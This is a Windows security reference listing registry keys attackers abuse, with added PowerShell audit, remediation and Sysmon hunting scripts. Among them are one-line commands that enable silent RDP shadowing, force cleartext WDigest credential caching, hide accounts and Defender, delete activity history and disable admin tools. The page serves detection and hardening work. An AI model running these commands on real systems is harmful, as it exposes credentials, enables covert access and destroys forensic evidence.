Commonly Abused Windows Registry Keys


Terminal Services

RDP Shadow - No Prompt

reg.exe add "HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services" /V Shadow /T REG_DWORD /D 2 /F

Delete RDP Connection History

reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

Change RDP Port

$portvalue = 3390
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "PortNumber" -Value $portvalue

https://docs.microsoft.com/en-us/windows-server/remote/remote-desktop-services/clients/change-listening-port

Change Prompt for Shadow Session

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 2

0: Deny remote control.
1: Obtain user permission and interact with the session.
2: Do not obtain user permission and interact with the session.
3: Obtain user permission and display session.
4: Do not obtain user permission and display session.

http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/

http://woshub.com/rdp-session-shadow-to-windows-10-user/

Enable (Unsolicited) Remote Assistance

HKEY_LOCAL_MACHINE\Software\policies\Microsoft\Windows NT\Terminal Services\fAllowUnsolicited

HKEY_LOCAL_MACHINE\Software\policies\Microsoft\Windows NT\Terminal Services\fAllowUnsolicitedFullControl
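The following PowerShell is an added, read-only audit of the Terminal Services settings listed in this section; it is not part of the original page. It decodes the Shadow value using the meanings given above, checks the two Remote Assistance flags, and reports whether the RDP listener is still on 3389. The function and variable names are my own; it needs administrator rights only so that every HKLM key can be read.

```powershell
# Added example, not part of the original page: read-only audit of the
# Terminal Services keys listed above. Nothing is modified.

$tsPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
$rdpTcp   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'

# Meaning of each Shadow value, as documented on this page.
$shadowMeaning = @{
    0 = 'Deny remote control'
    1 = 'Obtain user permission and interact with the session'
    2 = 'Do not obtain user permission and interact with the session (silent control)'
    3 = 'Obtain user permission and display session'
    4 = 'Do not obtain user permission and display session (silent view)'
}

function Get-RegValueOrNull {
    param([string]$Path, [string]$Name)
    # Get-ItemProperty throws when the key or value is missing; treat that as "not set".
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Get-TerminalServicesAudit {
    # --- Shadow (session shadowing prompt) ---
    $shadow = Get-RegValueOrNull $tsPolicy 'Shadow'
    if ($null -eq $shadow) {
        $meaning = 'Policy not set; Windows default (ask for user consent) applies'
        $risk    = 'Info'
    } else {
        $meaning = $shadowMeaning[[int]$shadow]
        # 2 and 4 allow shadowing with no prompt to the user; 1 and 3 still prompt.
        $risk = if ($shadow -in 2, 4) { 'High' } elseif ($shadow -in 1, 3) { 'Medium' } else { 'Low' }
    }
    [pscustomobject]@{ Setting = 'Shadow'; Value = $shadow; Meaning = $meaning; Risk = $risk }

    # --- Unsolicited Remote Assistance ---
    foreach ($name in 'fAllowUnsolicited', 'fAllowUnsolicitedFullControl') {
        $v = Get-RegValueOrNull $tsPolicy $name
        $enabled = ($v -eq 1)
        $meaning = if ($enabled) { 'Unsolicited Remote Assistance allowed' } else { 'Not enabled' }
        $risk    = if ($enabled) { 'High' } else { 'Low' }
        [pscustomobject]@{ Setting = $name; Value = $v; Meaning = $meaning; Risk = $risk }
    }

    # --- RDP listener port ---
    $port = Get-RegValueOrNull $rdpTcp 'PortNumber'
    $meaning = if ($port -eq 3389) { 'Default listener port' } else { 'Non-default port; confirm it is an approved change' }
    $risk    = if ($port -eq 3389) { 'Info' } else { 'Medium' }
    [pscustomobject]@{ Setting = 'RDP PortNumber'; Value = $port; Meaning = $meaning; Risk = $risk }
}

Get-TerminalServicesAudit | Format-Table -AutoSize
```

A Shadow value of 2 or 4 on a host where no GPO sets it is the condition worth alerting on; a GPO-managed value will be re-applied on every policy refresh, so a locally set one that differs from the domain policy is a strong tamper signal.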


Credential Access

Store WDigest Credential in Cleartext in Memory

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/forcing-wdigest-to-store-credentials-in-plaintext

Look for PuTTY saved sessions (hostnames, usernames and paths to private key files)

reg query "HKEY_CURRENT_USER\Software\SimonTatham\Putty\Sessions"

https://superuser.com/questions/109587/transferring-putty-session-data
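As an added example (not from the original page) for the WDigest entry above, the function below reports whether UseLogonCredential is in the weak state and, when run with -Remediate, sets it back to 0. Function and parameter names are my own; it assumes an elevated PowerShell session because the value lives under HKLM.

```powershell
# Added example, not part of the original page: check the WDigest setting
# described above and optionally restore the hardened value.
# UseLogonCredential = 1 makes LSASS keep cleartext credentials in memory;
# 0 (the default since Windows 8.1 / Server 2012 R2 and after KB2871997) does not.

function Test-WDigestHardening {
    [CmdletBinding()]
    param([switch]$Remediate)

    $path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $name = 'UseLogonCredential'

    # Missing value is the normal state on patched systems; an explicit 1 is the abuse indicator.
    $current = try { (Get-ItemProperty -Path $path -Name $name -ErrorAction Stop).$name } catch { $null }

    if ($current -eq 1) {
        $state = 'Weak (cleartext credentials cached in LSASS)'
    }
    elseif ($null -eq $current) {
        $state = 'Default (value not present)'
    }
    else {
        $state = 'Hardened (explicit 0)'
    }

    if ($current -eq 1 -and $Remediate) {
        # Writing an explicit 0 instead of deleting the value means a later re-add
        # shows up as a value change rather than a fresh creation in audit logs.
        Set-ItemProperty -Path $path -Name $name -Value 0 -Type DWord
        $state = 'Remediated to 0 (applies to new logons; credentials already cached remain until logoff/reboot)'
    }

    [pscustomobject]@{ Path = $path; Name = $name; Value = $current; State = $state }
}

Test-WDigestHardening -Remediate
```

Because the value is read by LSASS at logon, remediation alone does not clear secrets already held for active sessions; the finding should also trigger a check of who logged on while the value was 1.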


Defense Evasion

Hide User from Login Page

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v <username> /t REG_DWORD /d 0 /f

Hide Uninstall Option for Application

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall

https://docs.microsoft.com/en-us/windows/win32/msi/uninstall-registry-key

Remove “Scan with Windows Defender” option from context menu

HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP

https://winaero.com/how-to-delete-scan-with-windows-defender-from-context-menu-in-windows-10/

Hide Windows Defender from Settings Sidebar

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f

https://winaero.com/how-to-show-or-hide-windows-defender-tray-icon-in-windows-10/

Delete Artifacts

Delete MUI Cache

reg delete "HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache"

Delete record of typed paths in explorer

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths"

https://forensafe.com/blogs/typedpaths.html

Delete “Most recently used list” (Apps launched from Windows Run Menu)

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
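The Delete Artifacts entries above, together with the RDP connection history entries in the Terminal Services section, are all key deletions that leave a trace if registry events are being logged. The following added example (mine, not from the original page) hunts the Sysmon operational log for creations, deletions and value writes touching those keys. It assumes Sysmon is installed with a configuration that records RegistryEvent (IDs 12 and 13) for these paths; without that, the query simply returns nothing.

```powershell
# Added example, not part of the original page: find Sysmon registry events
# that touched the history keys this page lists as targets for deletion.
# Assumption: Sysmon logs RegistryEvent (ID 12 = key/value create or delete,
# ID 13 = value set) for these paths.

# Key suffixes taken from the entries above.
$watched = @(
    'Terminal Server Client\Servers'
    'Terminal Server Client\Default'
    'Shell\MuiCache'
    'Explorer\TypedPaths'
    'Explorer\RunMRU'
)

function Get-HistoryKeyTampering {
    param([int]$Hours = 24)

    $filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 12, 13
        StartTime = (Get-Date).AddHours(-$Hours)
    }

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Sysmon puts its fields in named EventData elements; pull them from the XML.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        $target = $data['TargetObject']
        if ($watched | Where-Object { $target -like "*$_*" }) {
            [pscustomobject]@{
                Time      = $_.TimeCreated
                EventId   = $_.Id
                EventType = $data['EventType']   # DeleteKey, DeleteValue, SetValue, CreateKey
                Process   = $data['Image']
                User      = $data['User']
                Target    = $target
            }
        }
    }
}

Get-HistoryKeyTampering -Hours 24 | Format-Table -AutoSize
```

A DeleteKey on RunMRU or TypedPaths whose Image is reg.exe or powershell.exe, rather than explorer.exe, is the pattern to alert on; Explorer itself rewrites these keys, so filter on the process to keep the noise down. Without Sysmon, the equivalent signal is Security event 4657 or 4660, which requires a SACL on the keys.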

Disable Windows Admin Tools

Disable Task Manager

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr

https://winaero.com/how-to-disable-task-manager-in-windows-10/

Disable navigating to directories via explorer bar

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun

https://forums.ivanti.com/s/article/Users-can-access-resources-through-explorer-although-NoRun-is-enabled?language=en_US

Disable Regedit and Reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableRegistryTools" /t REG_DWORD /d "1" /f

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsTools::DisableRegedit

Disable CMD

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System /v "DisableCMD" /t REG_DWORD /d "1" /f

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsTools::DisableCMD

Disable selected program

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisallowRun /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "Minesweeper.exe" /f

https://github.com/ION28/BLUESPAWN/issues/257

http://systemmanager.ru/win2k_regestry.en/93501.htm

Hide Action Center Icon

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f

https://catonrug.blogspot.com/2014/05/remove-action-center-icon-via-group-policy.html


Privilege Escalation

AlwaysInstallElevated: MSI installations run as SYSTEM regardless of the user who launched them (the value must be 1 in both HKLM and HKCU for the policy to be in effect)

reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated
reg query "HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated

https://www.securitynik.com/2022/01/beginning-exploitation-of.html
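The added PowerShell below (mine, not from the original page) audits the policy values listed under Defense Evasion (Hide User, Disable Windows Admin Tools, Hide Action Center Icon) and Privilege Escalation in one pass. It checks each value in both HKLM and HKCU, because the per-user copies are the ones a non-admin attacker can write, lists any executables blocked through DisallowRun, reports accounts hidden from the logon screen, and applies the both-hives rule for AlwaysInstallElevated. Names of the function and variables are my own; the check list is read-only.

```powershell
# Added example, not part of the original page: read-only audit of the policy
# values listed in the Defense Evasion and Privilege Escalation sections.

# Registry path (without hive), value name, and a wildcard pattern matching the abused state.
$checks = @(
    @{ Path = 'Software\Microsoft\Windows\CurrentVersion\Policies\System';   Name = 'DisableTaskMgr';         Bad = '1' }
    @{ Path = 'Software\Microsoft\Windows\CurrentVersion\Policies\System';   Name = 'DisableRegistryTools';   Bad = '1' }
    @{ Path = 'Software\Policies\Microsoft\Windows\System';                  Name = 'DisableCMD';             Bad = '[12]' }  # 1 = cmd + batch, 2 = cmd only
    @{ Path = 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'NoRun';                  Bad = '1' }
    @{ Path = 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'DisallowRun';            Bad = '1' }
    @{ Path = 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'HideSCAHealth';          Bad = '1' }
    @{ Path = 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'SettingsPageVisibility'; Bad = 'hide:*' }
)

function Get-RegValueOrNull {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Get-PolicyTampering {
    foreach ($hive in 'HKLM:', 'HKCU:') {
        foreach ($c in $checks) {
            $v = Get-RegValueOrNull "$hive\$($c.Path)" $c.Name
            if ($null -ne $v -and "$v" -like $c.Bad) {
                [pscustomobject]@{ Where = "$hive\$($c.Path)\$($c.Name)"; Value = $v
                                   Finding = 'Restrictive policy set; confirm it is GPO-managed' }
            }
        }

        # DisallowRun keeps its block list as numbered REG_SZ values in a sub-key.
        $disallow = "$hive\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun"
        if (Test-Path $disallow) {
            $blocked = (Get-ItemProperty -Path $disallow).PSObject.Properties |
                Where-Object { $_.Name -notlike 'PS*' } | ForEach-Object { $_.Value }
            if ($blocked) {
                [pscustomobject]@{ Where = $disallow; Value = ($blocked -join ', ')
                                   Finding = 'Executables blocked from running' }
            }
        }
    }

    # SpecialAccounts\Userlist: a DWORD named after an account, set to 0, hides it from the logon screen.
    $userlist = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist'
    if (Test-Path $userlist) {
        foreach ($p in (Get-ItemProperty -Path $userlist).PSObject.Properties) {
            if ($p.Name -notlike 'PS*' -and $p.Value -eq 0) {
                [pscustomobject]@{ Where = "$userlist\$($p.Name)"; Value = $p.Value
                                   Finding = 'Account hidden from logon screen' }
            }
        }
    }

    # AlwaysInstallElevated is only effective when set to 1 in both hives.
    $aiePath = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $aieHklm = Get-RegValueOrNull "HKLM:\$aiePath" 'AlwaysInstallElevated'
    $aieHkcu = Get-RegValueOrNull "HKCU:\$aiePath" 'AlwaysInstallElevated'
    if ($aieHklm -eq 1 -and $aieHkcu -eq 1) {
        [pscustomobject]@{ Where = "HKLM+HKCU\$aiePath\AlwaysInstallElevated"; Value = 1
                           Finding = 'Enabled in both hives: any user-launched MSI runs as SYSTEM' }
    } elseif ($aieHklm -eq 1 -or $aieHkcu -eq 1) {
        [pscustomobject]@{ Where = "HKLM/HKCU\$aiePath\AlwaysInstallElevated"; Value = "$aieHklm/$aieHkcu"
                           Finding = 'Enabled in one hive only; not effective yet, but review who set it' }
    }
}

Get-PolicyTampering | Format-Table -AutoSize -Wrap
```

Run it under the account you are investigating, since HKCU is resolved for the current user; for other profiles load their NTUSER.DAT or query HKEY_USERS by SID. Any HKCU hit that has no matching GPO in gpresult output is a local modification and should be treated as tampering rather than configuration.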